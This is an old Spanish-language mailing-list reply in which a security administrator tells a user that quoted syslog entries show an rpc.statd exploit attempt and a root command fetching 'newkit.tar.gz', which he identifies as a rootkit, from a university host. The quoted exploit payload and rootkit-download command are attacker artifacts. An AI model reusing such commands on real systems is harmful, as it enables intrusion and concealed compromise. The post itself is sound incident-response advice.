Re: Hack

> Que tal amigos, checando mis log me encontre con esto
> (...)
> Sep  2 14:01:12 micompu rpc.statd[419]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^
> Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 8049710
> 8054da0687465676274736f6d616e7972652065
> 20726f7220726f66

Se descubrio hace poco una vulnerabilidad enorme justo en el rpc.statd...

> (...)
>
> y se que hicieron esto con la cuenta de root:
> (...)
> rcp root@128.95.73.225:newkit.tar.gz .;
>
> Alguie sabe que significa, en verdad hackearon mi computadora?

Sin lugar a dudas. newkit.tar.gz es seguramente un rootkit - un juego re
archivos formado para ocultar la presencia de un atacante en tu sistema.

Puede servirte el saber que 128.95.73.225 es horus.wtc.washington.edu, una
computadora que corre algun tipo de Unix, y tiene una barbaridad de
puertos abiertos. Eso puede indicar que su administrador no es muy bueno,
y que, siendo probablemente una computadora utilizada por los alumnos de
la Universidad de Washington, el administrador te agradecera que reportes
quien se esta portando mal en su sistema, y posiblemente que le eches una
mano para cerrar sus agujeros.

Saludos,

           Gunnar Wolf    gwolf en campus iztacala unam mx
     Universidad Nacional Autónoma de México, Campus Iztacala
   Jefatura de Sección de Desarrollo y Admon. de Sistemas en Red
        Area de Seguridad en Computo - DCI - DGSCA - UNAM